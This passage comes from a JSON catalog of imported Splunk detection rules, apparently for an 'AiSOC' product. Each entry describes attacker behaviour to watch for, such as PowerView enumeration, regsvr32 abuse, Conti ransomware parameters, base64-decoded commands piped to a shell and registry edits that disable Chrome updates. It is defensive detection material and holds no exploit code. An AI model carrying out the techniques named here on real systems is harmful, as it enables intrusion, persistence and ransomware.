"detections/network/http_rmm_user_agent.yml" } }, { "id": "splunk-security-content-61994268-04f4-11ec-865c-acde48001122", "type": "detection", "name": "Get DomainUser with PowerShell Script Block", "description": "The following analytic detects the execution of the `Get-DomainUser` cmdlet using PowerShell Script Block Logging (EventCode=4104). This cmdlet is part of PowerView, a tool often used for domain enumeration. The detection leverages PowerShell operational logs to identify instances where this command is executed. Monitoring this activity is crucial as it may indicate an adversary's attempt to gather information about domain users, which is a common step in Active Directory Discovery. If confirmed malicious, this activity could lead to further reconnaissance and potential exploitation of domain resources.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/get-domainuser-with-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "61994268-04f4-11ec-865c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/get_domainuser_with_powershell_script_block.yml" } }, { "id": "splunk-security-content-619eac6c-0f03-4699-ae29-5f337877bcf9", "type": "detection", "name": "Windows Chrome Auto-Update Disabled via Registry", "description": "The following analytic detects modifications to Windows registry values that disable Google Chrome auto-updates.\nChanges to values such as DisableAutoUpdateChecksCheckboxValue = 1, Update{8A69D345-D564-463C-AFF1-A69D9E530F96} = 0, UpdateDefault = 0, and AutoUpdateCheckPeriodMinutes = 0 can prevent Chrome from receiving security updates.\nThis behavior may indicate attempts to bypass update policies, maintain unauthorized extensions, or facilitate malware persistence.\nMonitoring these registry changes helps identify potential policy violations or malicious activity targeting browser security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1185" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-chrome-auto-update-disabled-via-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "619eac6c-0f03-4699-ae29-5f337877bcf9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_chrome_auto_update_disabled_via_registry.yml" } }, { "id": "splunk-security-content-61ae09c2-079e-44b1-8be0-74e35c5a679e", "type": "detection", "name": "Cisco Network Interface Modifications", "description": "This analytic detects the creation or modification of network interfaces on Cisco devices, which could indicate an attacker establishing persistence or preparing for lateral movement. After gaining initial access to network devices, threat actors like Static Tundra often create new interfaces (particularly loopback interfaces) to establish covert communication channels or maintain persistence. This detection specifically looks for the configuration of new interfaces, interface state changes, and the assignment of IP addresses to interfaces. These activities are particularly concerning when they involve unusual interface names or descriptions containing suspicious terms.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556", "T1021", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-network-interface-modifications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "61ae09c2-079e-44b1-8be0-74e35c5a679e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_network_interface_modifications.yml" } }, { "id": "splunk-security-content-61e9a56a-20fa-11ec-8ba3-acde48001122", "type": "detection", "name": "Verclsid CLSID Execution", "description": "The following analytic detects the potential abuse of the verclsid.exe utility to execute malicious files via generated CLSIDs. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific command-line patterns associated with verclsid.exe. This activity is significant because verclsid.exe is a legitimate Windows application used to verify CLSID COM objects, and its misuse can indicate an attempt to bypass security controls. If confirmed malicious, this technique could allow an attacker to execute arbitrary code, potentially leading to system compromise or further malicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/verclsid-clsid-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "61e9a56a-20fa-11ec-8ba3-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/verclsid_clsid_execution.yml" } }, { "id": "splunk-security-content-61f10919-c360-4e56-9cda-f1f34500cfda", "type": "detection", "name": "Windows RDP Server Registry Entry Created", "description": "This detection identifies the creation of registry keys under HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\\, which occur when a user initiates a Remote Desktop Protocol (RDP) connection using the built-in Windows RDP client (mstsc.exe). These registry entries store information about previously connected remote hosts, including usernames and display settings. Their creation is a strong indicator that an outbound RDP session was initiated from the system. While the presence of these keys is normal during legitimate RDP use, their appearance can be used to track remote access activity, especially in environments where RDP is tightly controlled. In post-compromise scenarios, these artifacts may be created by threat actors using RDP for lateral movement or command-and-control. Monitoring the creation of these registry entries can help defenders detect initial use of RDP from a compromised host, particularly when correlated with unusual user behavior, logon patterns, or network activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-rdp-server-registry-entry-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "61f10919-c360-4e56-9cda-f1f34500cfda", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_rdp_server_registry_entry_created.yml" } }, { "id": "splunk-security-content-622f08d0-69ef-42c2-8139-66088bc25acd", "type": "detection", "name": "Windows CAB File on Disk", "description": "The following analytic detects .cab files being written to disk. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on events where the file name is '*.cab' and the action is 'write'. This activity is significant as .cab files can be used to deliver malicious payloads, including embedded .url files that execute harmful code. If confirmed malicious, this behavior could lead to unauthorized code execution and potential system compromise. Analysts should review the file path and associated artifacts for further investigation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-cab-file-on-disk.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "622f08d0-69ef-42c2-8139-66088bc25acd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_cab_file_on_disk.yml" } }, { "id": "splunk-security-content-624919bc-c382-11eb-adcc-acde48001122", "type": "detection", "name": "Conti Common Exec parameter", "description": "The following analytic detects the execution of suspicious command-line arguments commonly associated with Conti ransomware, specifically targeting local drives and network shares for encryption. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include command-line details. This activity is significant because it indicates a potential ransomware attack, which can lead to widespread data encryption and operational disruption. If confirmed malicious, the impact could be severe, resulting in data loss, system downtime, and potential ransom demands.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/conti-common-exec-parameter.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "624919bc-c382-11eb-adcc-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/conti_common_exec_parameter.yml" } }, { "id": "splunk-security-content-62606c77-d53d-4182-9371-b02cdbbbcef7", "type": "detection", "name": "Windows Rapid Authentication On Multiple Hosts", "description": "The following analytic detects a source computer authenticating to 30 or more remote endpoints within a 5-minute timespan using Event ID 4624. This behavior is identified by analyzing Windows Event Logs for LogonType 3 events and counting unique target computers. Such activity is significant as it may indicate lateral movement or network share enumeration by an adversary. If confirmed malicious, this could lead to unauthorized access to multiple systems, potentially compromising sensitive data and escalating privileges within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-rapid-authentication-on-multiple-hosts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "62606c77-d53d-4182-9371-b02cdbbbcef7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_rapid_authentication_on_multiple_hosts.yml" } }, { "id": "splunk-security-content-62732736-6250-11eb-ae93-0242ac130002", "type": "detection", "name": "Suspicious Regsvr32 Register Suspicious Path", "description": "The following analytic detects the use of Regsvr32.exe to register DLLs from suspicious paths such as AppData, ProgramData, or Windows Temp directories. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs and command-line arguments. This activity is significant because Regsvr32.exe can be abused to proxy execution of malicious code, bypassing traditional security controls. If confirmed malicious, this could allow an attacker to execute arbitrary code, potentially leading to system compromise, data exfiltration, or further lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.010" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-regsvr32-register-suspicious-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "62732736-6250-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_regsvr32_register_suspicious_path.yml" } }, { "id": "splunk-security-content-628d9c7c-3242-43b5-9620-7234c080a726", "type": "detection", "name": "Windows Snake Malware Kernel Driver Comadmin", "description": "The following analytic detects the creation of the comadmin.dat file in the %windows%\\system32\\Com directory, which is associated with Snake Malware. This detection leverages the Endpoint.Filesystem data model to identify file creation events matching the specified path and filename. This activity is significant because the comadmin.dat file is part of Snake Malware's installation process, which includes dropping a kernel driver and a custom DLL. If confirmed malicious, this activity could allow an attacker to load a malicious driver, potentially leading to privilege escalation and persistent access to the compromised system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-snake-malware-kernel-driver-comadmin.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "628d9c7c-3242-43b5-9620-7234c080a726", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_snake_malware_kernel_driver_comadmin.yml" } }, { "id": "splunk-security-content-62f10052-d7b3-4e48-b57b-56f8e3ac7ceb", "type": "detection", "name": "Azure AD Successful PowerShell Authentication", "description": "The following analytic identifies a successful authentication event against an Azure AD tenant using PowerShell cmdlets. This detection leverages Azure AD SignInLogs to identify successful logins where the appDisplayName is \"Microsoft Azure PowerShell.\" This activity is significant because it is uncommon for regular, non-administrative users to authenticate using PowerShell, and it may indicate enumeration and discovery techniques by an attacker. If confirmed malicious, this activity could allow attackers to perform extensive reconnaissance, potentially leading to privilege escalation or further exploitation within the Azure environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-successful-powershell-authentication.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "62f10052-d7b3-4e48-b57b-56f8e3ac7ceb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_successful_powershell_authentication.yml" } }, { "id": "splunk-security-content-62fed254-513b-460e-953d-79771493a9f3", "type": "detection", "name": "Detect HTML Help Renamed", "description": "The following analytic detects instances where hh.exe (HTML Help) has been renamed and is executing a Compiled HTML Help (CHM) file. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and original file names. This activity is significant because attackers can use renamed hh.exe to execute malicious scripts embedded in CHM files, potentially leading to code execution. If confirmed malicious, this technique could allow attackers to run arbitrary scripts, escalate privileges, or persist within the environment, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-html-help-renamed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "62fed254-513b-460e-953d-79771493a9f3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_html_help_renamed.yml" } }, { "id": "splunk-security-content-630b1694-210a-48ee-a450-6f79e7679f2c", "type": "detection", "name": "Azure AD High Number Of Failed Authentications For User", "description": "The following analytic identifies an Azure AD account experiencing more than 20 failed authentication attempts within a 10-minute window. This detection leverages Azure SignInLogs data, specifically monitoring for error code 50126 and unsuccessful authentication attempts. This behavior is significant as it may indicate a brute force attack targeting the account. If confirmed malicious, an attacker could potentially gain unauthorized access, leading to data breaches or further exploitation within the environment. Security teams should adjust the threshold based on their specific environment to reduce false positives.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-high-number-of-failed-authentications-for-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "630b1694-210a-48ee-a450-6f79e7679f2c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_high_number_of_failed_authentications_for_user.yml" } }, { "id": "splunk-security-content-630ea8b2-2800-4f5d-9cbc-d65c567349b0", "type": "detection", "name": "Confluence CVE-2023-22515 Trigger Vulnerability", "description": "The following analytic identifies potential exploitation attempts of the Confluence CVE-2023-22515 vulnerability. It detects successful accesses (HTTP status 200) to specific vulnerable endpoints by analyzing web logs within the Splunk 'Web' Data Model. This activity is significant for a SOC as it indicates possible privilege escalation attempts in Confluence. If confirmed malicious, attackers could gain unauthorized access or create accounts with escalated privileges, leading to potential data breaches or further exploitation within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/confluence-cve-2023-22515-trigger-vulnerability.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "630ea8b2-2800-4f5d-9cbc-d65c567349b0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/confluence_cve_2023_22515_trigger_vulnerability.yml" } }, { "id": "splunk-security-content-6338266a-ee2a-11eb-bf68-acde48001122", "type": "detection", "name": "Rundll32 Process Creating Exe Dll Files", "description": "The following analytic detects a rundll32 process creating executable (.exe) or dynamic link library (.dll) files. It leverages Sysmon EventCode 11 to identify instances where rundll32.exe generates these file types. This activity is significant because rundll32 is often exploited by malware, such as IcedID, to drop malicious payloads in directories like Temp, AppData, or ProgramData. If confirmed malicious, this behavior could allow an attacker to execute arbitrary code, establish persistence, or escalate privileges within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/rundll32-process-creating-exe-dll-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6338266a-ee2a-11eb-bf68-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/rundll32_process_creating_exe_dll_files.yml" } }, { "id": "splunk-security-content-635c26cc-0fd1-4098-8ec9-824bf9544b11", "type": "detection", "name": "ASL AWS SAML Update identity provider", "description": "The following analytic detects updates to the SAML provider in AWS. It leverages AWS CloudTrail logs to identify the `UpdateSAMLProvider` event, analyzing fields such as `sAMLProviderArn`, `sourceIPAddress`, and `userIdentity` details. Monitoring updates to the SAML provider is crucial as it may indicate a perimeter compromise of federated credentials or unauthorized backdoor access set by an attacker. If confirmed malicious, this activity could allow attackers to manipulate identity federation, potentially leading to unauthorized access to cloud resources and sensitive data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-saml-update-identity-provider.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "635c26cc-0fd1-4098-8ec9-824bf9544b11", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_saml_update_identity_provider.yml" } }, { "id": "splunk-security-content-637557ec-ca08-11eb-bd0a-acde48001122", "type": "detection", "name": "Powershell Creating Thread Mutex", "description": "The following analytic detects the execution of PowerShell scripts using the `mutex` function via EventCode 4104. This detection leverages PowerShell Script Block Logging to identify scripts that create thread mutexes, a technique often used in obfuscated scripts to ensure only one instance runs on a compromised machine. This activity is significant as it may indicate the presence of sophisticated malware or persistence mechanisms. If confirmed malicious, the attacker could maintain exclusive control over a process, potentially leading to further exploitation or persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027.005", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-creating-thread-mutex.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "637557ec-ca08-11eb-bd0a-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_creating_thread_mutex.yml" } }, { "id": "splunk-security-content-637b603e-1799-40fd-bf87-47ecbd551b66", "type": "detection", "name": "Linux Decode Base64 to Shell", "description": "The following analytic detects the behavior of decoding base64-encoded data and passing it to a Linux shell. Additionally, it mitigates the potential damage and protects the organization's systems and data.The detection is made by searching for specific commands in the Splunk query, namely \"base64 -d\" and \"base64 --decode\", within the Endpoint.Processes data model. The analytic also includes a filter for Linux shells. The detection is important because it indicates the presence of malicious activity since Base64 encoding is commonly used to obfuscate malicious commands or payloads, and decoding it can be a step in running those commands. It suggests that an attacker is attempting to run malicious commands on a Linux system to gain unauthorized access, for data exfiltration, or perform other malicious actions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-decode-base64-to-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "637b603e-1799-40fd-bf87-47ecbd551b66", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_decode_base64_to_shell.yml" } }, { "id": "splunk-security-content-63a2c15e-9448-43c5-a4a8-9852266aaada", "type": "detection", "name": "Windows App Layer Protocol Qakbot NamedPipe", "description": "The following analytic detects a suspicious process creating or connecting to a potential Qakbot named pipe. It leverages Sysmon EventCodes 17 and 18, focusing on specific processes known to be abused by Qakbot and identifying randomly generated named pipes in GUID form. This activity is significant as Qakbot malware uses named pipes for inter-process communication after code injection, facilitating data theft. If confirmed malicious, this behavior could indicate a Qakbot infection, leading to unauthorized data access and potential exfiltration from the compromised host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-app-layer-protocol-qakbot-namedpipe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "63a2c15e-9448-43c5-a4a8-9852266aaada", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_app_layer_protocol_qakbot_namedpipe.yml" } }, { "id": "splunk-security-content-63a449ae-9f04-11ec-945e-acde48001122", "type": "detection", "name": "Windows Disable Windows Group Policy Features Through Registry", "description": "The following analytic detects suspicious registry modifications aimed at disabling Windows Group Policy features. It leverages data from the Endpoint.Registry data model, focusing on specific registry paths and values associated with disabling key Windows functionalities. This activity is significant because it is commonly used by ransomware to hinder mitigation and forensic response efforts. If confirmed malicious, this behavior could severely impair the ability of security teams to analyze and respond to the attack, allowing the attacker to maintain control and persist within the compromised environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-disable-windows-group-policy-features-through-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "63a449ae-9f04-11ec-945e-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_disable_windows_group_policy_features_through_registry.yml" } }, { "id": "splunk-security-content-63a8a537-36fd-4aac-a3ea-1a96afd2c871", "type": "detection", "name": "O365 DLP Rule Triggered", "description": "The following analytic detects when Microsoft Office 365 Data Loss Prevention (DLP) rules have been triggered. DLP rules can be configured for any number of security, regulatory, or business compliance reasons, as such this analytic will only be as accurate as the upstream DLP configuration. Detections from this analytic should be evaluated thoroughly to de termine what, if any, security relevance the underlying DLP events contain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048", "T1567" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-dlp-rule-triggered.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "63a8a537-36fd-4aac-a3ea-1a96afd2c871", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_dlp_rule_triggered.yml" } }, { "id": "splunk-security-content-63e3aff9-45d7-4d41-bcdb-9da561fb4533", "type": "detection", "name": "Cisco IOS Suspicious Privileged Account Creation", "description": "This analytic detects the creation of privileged user accounts on Cisco IOS devices, which could indicate an attacker establishing backdoor access. The detection focuses on identifying when user accounts are created with privilege level 15 (the highest administrative privilege level in Cisco IOS) or when existing accounts have their privileges elevated. This type of activity is particularly concerning when performed by unauthorized users or during unusual hours, as it may represent a key step in establishing persistence following the exploitation of vulnerabilities like CVE-2018-0171 in Cisco Smart Install. Threat actors like Static Tundra have been observed creating privileged accounts as part of their attack chain after gaining initial access to network devices.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136", "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-ios-suspicious-privileged-account-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "63e3aff9-45d7-4d41-bcdb-9da561fb4533", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_ios_suspicious_privileged_account_creation.yml" } }, { "id": "splunk-security-content-640b0eda-0429-11ec-accd-acde48001122", "type": "detection", "name": "GetWmiObject User Account with PowerShell Script Block", "description": "The following analytic detects the execution of the `Get-WmiObject` commandlet with the `Win32_UserAccount` parameter via PowerShell Script Block Logging (EventCode=4104). This method leverages script block text to identify when a list of all local users is being enumerated. This activity is significant as it may indicate an adversary or Red Team operation attempting to gather user information for situational awareness and Active Directory discovery. If confirmed malicious, this could lead to further reconnaissance, privilege escalation, or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1087.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getwmiobject-user-account-with-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "640b0eda-0429-11ec-accd-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getwmiobject_user_account_with_powershell_script_block.yml" } }, { "id": "splunk-security-content-6410a403-36bb-490f-a06a-11c3be7d2a41", "type": "detection", "name": "Windows Modify Registry AuthenticationLevelOverride", "description": "The following analytic detects modifications to the Windows registry key \"AuthenticationLevelOverride\" within the Terminal Server Client settings. It leverages data from the Endpoint.Registry datamodel to identify changes where the registry value is set to 0x00000000. This activity is significant as it may indicate an attempt to override authentication levels for remote connections, a tactic used by DarkGate malware for malicious installations. If confirmed malicious, this could allow attackers to gain unauthorized remote access, potentially leading to data exfiltration or further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-authenticationleveloverride.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6410a403-36bb-490f-a06a-11c3be7d2a41", "source_commit": 